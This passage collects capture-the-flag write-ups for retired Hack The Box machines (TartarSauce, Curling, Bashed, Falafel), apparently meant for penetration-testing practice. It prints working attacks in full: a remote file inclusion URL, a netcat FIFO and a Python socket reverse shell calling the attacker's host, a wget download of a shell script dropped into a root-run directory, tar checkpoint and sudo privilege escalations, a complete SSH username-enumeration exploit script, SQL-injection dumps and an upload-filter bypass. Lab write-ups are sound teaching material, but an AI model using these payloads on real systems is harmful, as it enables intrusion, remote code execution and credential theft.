| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds
Let's navigate to port 80 in a web browser. Opening the IP in the URL bar shows the web page in the image below.

We don't find anything on the web page, so we run dirb to enumerate directories and find one called "/webservices/". It shows nothing by itself, so we enumerate "/webservices/" further.

Dirb scan gave us the directory called “/webservices/wp/” that hosts a WordPress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [08/Apr/2019 15:04:19] "GET /wp-load.php HTTP/1.0" 200 -
C:\Users\jacco>curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.20/

We set up a netcat listener; as soon as the RFI executes our PHP shell we get a reverse shell. In "/home" there is a directory for "onuma" that we cannot access. So we spawn a tty with python and check the sudoers list: we can run tar as user "onuma" without a password, which we can abuse for privilege escalation through tar's checkpoint actions (the same primitive behind tar wildcard injection).

We take advantage of tar's checkpoint options. The --checkpoint=x flag tells tar to take some action every x records, as a progress update; the default is to print a status message, but --checkpoint-action lets the user specify what to run at a checkpoint. So we can have it hand us a shell as onuma:

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.88: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.88] 58770: NO_DATA
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
10:06:50 up 16:51, 0 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
onuma@TartarSauce:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
onuma@TartarSauce:/$ ls
ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run snap sys usr vmlinuz
onuma@TartarSauce:/$ cat /home/onuma/user.txt
cat /home/onuma/user.txt
b2d*****2c7

I use pspy to watch processes; letting pspy32 run for a while shows a script that runs as root every 5 minutes:

2018/05/29 07:56:33 CMD: UID=0    PID=24065  | /bin/bash /usr/sbin/backuperer

Enumerating the system we find that the file backuperer is a symlink to a file named "backup" in the "/usr/local/bin" directory.

Its content shows that it creates a gzip archive of the files under "/var/www/html/" and checks the integrity of that archive 30 seconds after creating it.

We use a script that takes advantage of that sleep: because the integrity check only happens 30 seconds after the archive is written, we have 30 seconds to replace the archive with our own. We use this script here. After running it we find the root flag.

Author: Sayantan Bera

HTB – Curling

Today we are going to solve the CTF challenge "Curling". It is a lab developed by Hack the Box, who have an amazing collection of online labs on which you can practise your penetration testing skills, designed for beginner to expert penetration testers. Curling is a retired lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

As these labs are only available online, they have a static IP. Curling has IP 10.10.10.150.

Now, as always, let's begin with port enumeration.

On port 80 we see a blog titled "Cewl Curling site!", and it's Joomla. At this point I would run joomscan, but I wanted to do some manual enumeration first, so I checked the page source and at the end of the body found this comment:

So I checked /secret.txt and found this base64 string :

c:\PENTEST>curl http://10.10.10.150/secret.txt
Q3VybGluZzIwMTgh

Decoding :

PS C:\Users\jacco> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q3VybGluZzIwMTgh"))
Curling2018!

Curling2018! we can use that as a password. But what is the username ? If we take a look at the main page again and read the posts :

We will notice a name in one of the posts : Floris , now we can try to login as floris with the password Curling2018! :

And it worked. While I was doing this enumeration I ran wfuzz in the background and got these results :

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.150/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.150/FUZZ
Total requests: 220551

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000007:  C=301      9 L       28 W          313 Ch        "images"
000005:  C=200    361 L     1051 W        14261 Ch        ""
000001:  C=200    361 L     1051 W        14261 Ch        "# directory-list-2.3-medium.txt"
000002:  C=200    361 L     1051 W        14261 Ch        "#"
000003:  C=200    361 L     1051 W        14261 Ch        "# Copyright 2007 James Fisher"
000004:  C=200    361 L     1051 W        14261 Ch        "#"
000071:  C=301      9 L       28 W          312 Ch        "media"
000072:  C=301      9 L       28 W          316 Ch        "templates"
000136:  C=301      9 L       28 W          314 Ch        "modules"
000474:  C=301      9 L       28 W          310 Ch        "bin"
000510:  C=301      9 L       28 W          314 Ch        "plugins"
000629:  C=301      9 L       28 W          315 Ch        "includes"
000861:  C=301      9 L       28 W          315 Ch        "language"
000996:  C=301      9 L       28 W          317 Ch        "components"
001074:  C=301      9 L       28 W          312 Ch        "cache"
001240:  C=301      9 L       28 W          316 Ch        "libraries"
003228:  C=301      9 L       28 W          310 Ch        "tmp"
003538:  C=301      9 L       28 W          314 Ch        "layouts"
005680:  C=301      9 L       28 W          320 Ch        "administrator"
012477:  C=404      9 L       32 W          279 Ch        "axs"
Finishing pending requests...

I also confirmed the username with the OpenSSH 2.3 < 7.7 username enumeration PoC (CVE-2018-15473, Exploit-DB 45210): a valid user makes the server choke on a deliberately malformed public-key request and drop the connection, an invalid one gets a normal authentication failure.

root@kali:~/htb/curling# cat 45210.py 
#!/usr/bin/env python

# Copyright (c) 2018 Matthew Daley
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# IN THE SOFTWARE.


import argparse
import logging
import paramiko
import socket
import sys


class InvalidUsername(Exception):
    pass


def add_boolean(*args, **kwargs):
    # Patched into paramiko below so the publickey request goes out truncated (malformed)
    pass


old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
    paramiko.common.MSG_SERVICE_ACCEPT]


def service_accept(*args, **kwargs):
    paramiko.message.Message.add_boolean = add_boolean
    return old_service_accept(*args, **kwargs)


def userauth_failure(*args, **kwargs):
    # Only an unknown user gets a regular USERAUTH_FAILURE back; a known user makes the
    # server try to parse the malformed packet and disconnect instead
    raise InvalidUsername()


paramiko.auth_handler.AuthHandler._handler_table.update({
    paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
    paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
})

logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str)
arg_parser.add_argument('--port', type=int, default=22)
arg_parser.add_argument('username', type=str)
args = arg_parser.parse_args()

sock = socket.socket()
try:
    sock.connect((args.hostname, args.port))
except socket.error:
    print('[-] Failed to connect')
    sys.exit(1)

transport = paramiko.transport.Transport(sock)
try:
    transport.start_client()
except paramiko.ssh_exception.SSHException:
    print('[-] Failed to negotiate SSH transport')
    sys.exit(2)

try:
    transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
    print('[*] Invalid username')
    sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
    print('[+] Valid username')
root@kali:~/htb/itvitae# pip install paramiko==2.0.8
root@kali:~/htb/itvitae# python 45210.py --p 22 10.10.10.150 floris
/usr/local/lib/python2.7/dist-packages/paramiko/ecdsakey.py:202: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
signature, ec.ECDSA(self.ecdsa_curve.hash_object())
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:110: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
algorithm=hashes.SHA1(),
[+] Valid username

Let’s go to /administrator and login to the administration panel :


Editing Template Files and Getting a Reverse Shell :

On the configuration section there’s an option for templates :

By going to that we notice that protostar is the default style and template :

From templates we will go to Protostar Details and Files and create a new php file :

 

In the php file we will execute a system command to get a reverse shell :

<?php
    system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 443 >/tmp/f');
?>

After saving the file we request http://10.10.10.150/templates/protostar/puckie.php

Then we check our listener :

c:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.150: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.150] 55960: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

User

We have a reverse shell as www-data, and in the /home directory there is a directory for floris:

We don't have read access to user.txt, but there is a file called password_backup. Looking at it:

It's a hex dump, so I copied it to my box to reverse it:

To reverse a hex dump we use xxd, so xxd -r pw_backup:

Not a readable output, so let's redirect the output to a file and look at it with file:

What happened is that it turned out to be a bzip2 file; decompressing it gave a gzip file, decompressing that gave another bzip2 file, and after decompressing that I got a tar file, which finally contained a txt file with the password:
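The recovery chain, as an added Python example that is not from the write-up: xxd_reverse() does what xxd -r does, and peel() identifies each layer by its magic bytes and unpacks it until something that is not a container comes out, so the order bzip2 > gzip > bzip2 > tar does not have to be discovered by running file by hand at every step. The sample blob is constructed in the code (build_sample) with a made-up password, not the box's password_backup; xxd_dump() mirrors xxd's default layout so the round trip can be checked offline.

```python
import bz2
import gzip
import io
import tarfile

# Added example (not from the write-up): reverse an xxd dump and peel nested archives by magic.


def xxd_dump(data: bytes) -> str:
    """Produce xxd's default layout: offset, 8 groups of 2 bytes, then the ASCII column."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        ascii_col = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {groups:<39}  {ascii_col}")
    return "\n".join(lines) + "\n"


def xxd_reverse(dump: str) -> bytes:
    """Equivalent of `xxd -r`: keep only the hex groups between the offset and the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        hex_part = line.split(":", 1)[1].split("  ", 1)[0]  # ASCII column starts after two spaces
        out += bytes.fromhex(hex_part.replace(" ", ""))
    return bytes(out)


def peel(blob: bytes, max_layers: int = 16):
    """Decompress or unpack repeatedly until the data is no longer a known container.

    Returns (layers, payload). Detection is by magic bytes, so the nesting order does not
    have to be known in advance; a tar layer yields its first regular file.
    """
    layers = []
    for _ in range(max_layers):
        if blob.startswith(b"BZh"):
            blob, kind = bz2.decompress(blob), "bzip2"
        elif blob.startswith(b"\x1f\x8b"):
            blob, kind = gzip.decompress(blob), "gzip"
        elif len(blob) > 262 and blob[257:262] == b"ustar":
            with tarfile.open(fileobj=io.BytesIO(blob)) as tf:
                member = next(m for m in tf.getmembers() if m.isfile())
                blob, kind = tf.extractfile(member).read(), f"tar:{member.name}"
        else:
            break
        layers.append(kind)
    return layers, blob


def build_sample(secret: bytes) -> bytes:
    """Constructed input shaped like the box's password_backup: a tar wrapped in bzip2, gzip, bzip2."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    return bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))


if __name__ == "__main__":
    # Made-up credential, not the box's real one
    dump = xxd_dump(build_sample(b"floris:Example-Only-Passw0rd\n"))
    layers, payload = peel(xxd_reverse(dump))
    print(" -> ".join(layers))
    print(payload.decode())
```

To use it on a real password_backup, read the file into a string and pass it to xxd_reverse(), then peel() the result; if peel() stops with something you do not recognise, run file on the returned payload and add the magic to the chain.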

Let’s ssh as floris :

And we owned user !


Curling

By looking at the /home directory of floris again :

There’s a directory called admin-area which contains two files :

input and report

input :

url = "http://127.0.0.1"

report :

It’s obvious that this is the output of executing curl on http://127.0.0.1 :

Even the name of the box, Curling, is a hint. So what about changing that url from localhost to something else, like a file? The next time the command gets executed we would get the contents of that file, maybe root.txt, but only if it’s being executed by root. Let’s try and see if it works:

Then we run watch cat report, which executes cat report every 2 seconds and shows us the output, easier than checking manually:

After some time we get the flag.


Dirty Sock ? Root shell !

I didn’t like the fact that I could only read the flag; I wanted a root shell. So I tried for a long time to bypass the url restriction and get a reverse shell, but couldn’t. Then, when I did this box again for the write-up, one of the things that caught my attention is that we are on an Ubuntu box, so I checked the snap version to see whether it is vulnerable to CVE-2019-7304, known as Dirty Sock, and of course it was:

This is not the intended path at all, because by the time this box was released CVE-2019-7304 wasn’t disclosed yet.

I got the exploit from here, then hosted it on a python simple HTTP server and downloaded it onto the box:

python3 dirty_sockv2.py 

Now we can su to dirty_sock and execute commands as root :

Or just sudo su and we will get a root shell :

HTB – Bashed

Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the expert penetration testers. Bashed is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, they have a static IP. The Bashed lab has IP 10.10.10.68.

Now, as always let’s begin our hacking with the port enumeration.

C:\Users\jacco>nmap -sC -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 18:45 W. Europe Summer Time
Nmap scan report for 10.10.10.68
Host is up (0.030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds

Next, we use wfuzz to enumerate directories and find some interesting ones such as /dev:

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000018: C=404 9 L 32 W 279 Ch "2006"
000019: C=404 9 L 32 W 279 Ch "news"
000013: C=200 161 L 397 W 7745 Ch "#"
000014: C=200 161 L 397 W 7745 Ch ""
000015: C=404 9 L 32 W 280 Ch "index"
000016: C=301 9 L 28 W 311 Ch "images"
000017: C=404 9 L 32 W 283 Ch "download"
000020: C=404 9 L 32 W 280 Ch "crack"
000021: C=404 9 L 32 W 281 Ch "serial"
000022: C=404 9 L 32 W 280 Ch "warez"
000023: C=404 9 L 32 W 279 Ch "full"
000030: C=404 9 L 32 W 277 Ch "11"
Finishing pending requests...
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000013: C=200 161 L 397 W 7745 Ch "#"
000016: C=301 9 L 28 W 311 Ch "images"
000012: C=200 161 L 397 W 7745 Ch "# on atleast 2 different hosts"
000014: C=200 161 L 397 W 7745 Ch ""
000164: C=301 9 L 28 W 312 Ch "uploads"
000338: C=301 9 L 28 W 308 Ch "php"
000550: C=301 9 L 28 W 308 Ch "css"
000834: C=301 9 L 28 W 308 Ch "dev"
000953: C=301 9 L 28 W 307 Ch "js"
002771: C=301 9 L 28 W 310 Ch "fonts"
044769: C=
Finishing pending requests...

When you open the /dev directory in the browser, you get a link to phpbash.php. Click on that link.

It redirects to the following page, which is a shell that you interact with through the browser.

After that, you can run any OS command to test whether it works. We ran ls to list the contents of the current directory.

We execute the following command in phpbash to get a proper reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 60876: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@bashed:/var/www/html/dev$ cd /home
cd /home
www-data@bashed:/home$ ls
ls
arrexel scriptmanager
www-data@bashed:/home$ cd arrexel
cd arrexel
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
2c2*****fc1
www-data@bashed:/home/arrexel$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:~$ wget http://10.10.14.20/puckshell.py
wget http://10.10.14.20/puckshell.py
--2019-04-03 09:35:59-- http://10.10.14.20/puckshell.py
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
Saving to: 'puckshell.py'

puckshell.py 100%[===================>] 213 --.-KB/s in 0s

2019-04-03 09:35:59 (30.4 MB/s) - 'puckshell.py' saved [213/213]
scriptmanager@bashed:~$ cp puckshell.py /scripts/puckshell.py
cp puckshell.py /scripts/puckshell.py
scriptmanager@bashed:~$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 20
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  3 09:43 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  213 Apr  3 09:43 puckshell.py
-rw-r--r--  1 scriptmanager scriptmanager    0 Apr  2 08:50 test.py
-rw-r--r--  1 scriptmanager scriptmanager   58 Apr  2 08:50 test.py.bak
-rw-r--r--  1 root          root            12 Apr  2 08:50 test.txt
scriptmanager@bashed:/scripts$ cat puckshell.py
cat puckshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);scriptmanager@bashed:/scripts$

Catch the connection on our listener:
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 51794: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
cc4*****8e2
#

Author: Jacco Straathof

HTB – Falafel

Today we are going to solve another CTF challenge, “Falafel”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Falafel is a retired vulnerable lab presented by Hack the Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Hard

Task: find user.txt & root.txt file on the victim’s machine

Since these labs are available online, they have a static IP; Falafel’s IP is 10.10.10.73, so let’s begin with an nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.73
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for 10.10.10.73
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds

Browsing to the target IP in a web browser shows a login page.

Enumeration

With the information we got from robots.txt, let’s brute-force for .txt files that might contain some useful information:

root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60 http://10.10.10.73/FUZZ.txt
********************************************************
* Wfuzz 2.1.5 - The Web Bruteforcer                      *
********************************************************

Target: http://10.10.10.73/FUZZ.txt
Total requests: 207643

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

01347:  C=200      1 L	       4 W	     30 Ch	  "robots"
06064:  C=200     17 L	     120 W	    804 Ch	  "cyberlaw"

Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926

Let’s check cyberlaw.txt

From this message I conclude that there is an admin account with a serious security issue: an attacker can take over the website through the image upload feature. There is also a hint about the URL filter.

We can also fuzz for other usernames:

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000003: C=200 102 L 657 W 7074 Ch "Aaron"
000004: C=200 102 L 657 W 7074 Ch "Aartjan"
000005: C=200 102 L 657 W 7074 Ch "Abagael"
000006: C=200 102 L 657 W 7074 Ch "Abagail"
000007: C=200 102 L 657 W 7074 Ch "Abahri"
^C
Finishing pending requests...

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=200    102 L	     659 W	   7091 Ch	  "Admin"
001488:  C=200    102 L	     659 W	   7091 Ch	  "Chris"

Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511

The next thing to try is whether there is a SQL injection vulnerability. To test it, we insert the following string as the username:

and press the login button with a random password. The web page answers: Wrong identification: admin, but we did not enter “admin” in the login form, so there is SQL injection!

 

Exploiting Web Application Vulnerabilities

Then we take the SQL injection further with sqlmap, passing “Wrong identification” as the string that identifies a true response.

c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 14:59:45 /2019-04-02/

--snip--
back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
+-------+
| users |
+-------+

[*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.2.11.19#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 15:01:18 /2019-04-02/

[15:01:18] [INFO] testing connection to the target URL
--snip--
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
+----+--------+----------+----------------------------------+
| ID | role | username | password |
+----+--------+----------+----------------------------------+
| 1 | admin | admin | 0e462096931906507119562988736854 |
| 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 |
+----+--------+----------+----------------------------------+

[*] ending @ 15:01:19 /2019-04-02/

As you can observe, the password hash for the user admin starts with 0e, and I didn’t know much about this type of hash, so a search on Google turned up a page about magic hashes.

The highlighted 32-character MD5 hash in that list is the same as the one above.
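An added example, not from the write-up, showing why a hash beginning with 0e matters when an application compares hashes with PHP’s loose ==: php_loose_equals() emulates that comparison, login_vulnerable() and login_fixed() are assumed stand-ins for the site’s login check (the page does not show its source), and "240610708" is a published magic-hash input.

```python
"""Why a '0e' hash is a problem: PHP's loose comparison (==) treats two numeric
strings as numbers, and "0e<digits>" is 0 * 10^n, i.e. zero. If the login does
`md5($pass) == $stored`, any input whose MD5 is also of the form 0e<digits>
compares equal to the stored hash. The fix is a strict, constant-time comparison."""
import hashlib
import hmac
import re

# Hash dumped from the falafel users table for the admin account (from the page).
ADMIN_HASH = "0e462096931906507119562988736854"

# PHP's idea of a numeric string: optional whitespace and sign, digits with an
# optional fraction and exponent. "0e4620..." qualifies; "abc" and "0x1A" do not.
PHP_NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equals(a: str, b: str) -> bool:
    """Emulate PHP `$a == $b` for two strings: numeric strings compare as floats."""
    if PHP_NUMERIC_STRING.match(a) and PHP_NUMERIC_STRING.match(b):
        return float(a) == float(b)          # "0e123" -> 0.0 and "0e999" -> 0.0: equal
    return a == b


def is_magic_hash(digest: str) -> bool:
    """A 'magic hash' is '0e' followed only by digits, so it is numeric and equals 0."""
    return re.fullmatch(r"0e\d+", digest) is not None


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def login_vulnerable(stored_hash: str, password: str) -> bool:
    """Mirrors `if (md5($pass) == $row['password'])` (assumed shape of the site's check)."""
    return php_loose_equals(md5_hex(password), stored_hash)


def login_fixed(stored_hash: str, password: str) -> bool:
    """Mirrors `hash_equals($row['password'], md5($pass))`: byte-wise and constant time.
    (Unsalted MD5 is still the wrong password hash; the comparison is the point here.)"""
    return hmac.compare_digest(stored_hash.encode(), md5_hex(password).encode())


if __name__ == "__main__":
    candidate = "240610708"                  # published magic-hash input: its MD5 starts with 0e
    print(md5_hex(candidate), is_magic_hash(md5_hex(candidate)))
    print("loose  ==  :", login_vulnerable(ADMIN_HASH, candidate))
    print("hash_equals:", login_fixed(ADMIN_HASH, candidate))
```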

With these credentials we log in to the admin dashboard and move to the upload option.

Here we try to upload a PHP file named shell.php, but it returns the error “Bad extension” as shown.

So we rename it to shell.php.png and try the upload again.

Yes! The file with the .png extension is uploaded successfully inside /var/www/html/uploads, so we can upload a malicious PHP file or any PHP backdoor with a .png extension.

Spawning Shell

Let’s create a PHP payload for uploading into the web site.

As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.

 

Trying very long filenames, I noticed that the web app truncates the filename saved on disk to a maximum of 236 characters. With this in mind we can create a file with a 240-character filename whose last 8 characters are “.php.png”. Because of the truncation, the last four characters “.png” are dropped, which leaves us with a file that has a “.php” extension.

Sample filename:

verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png
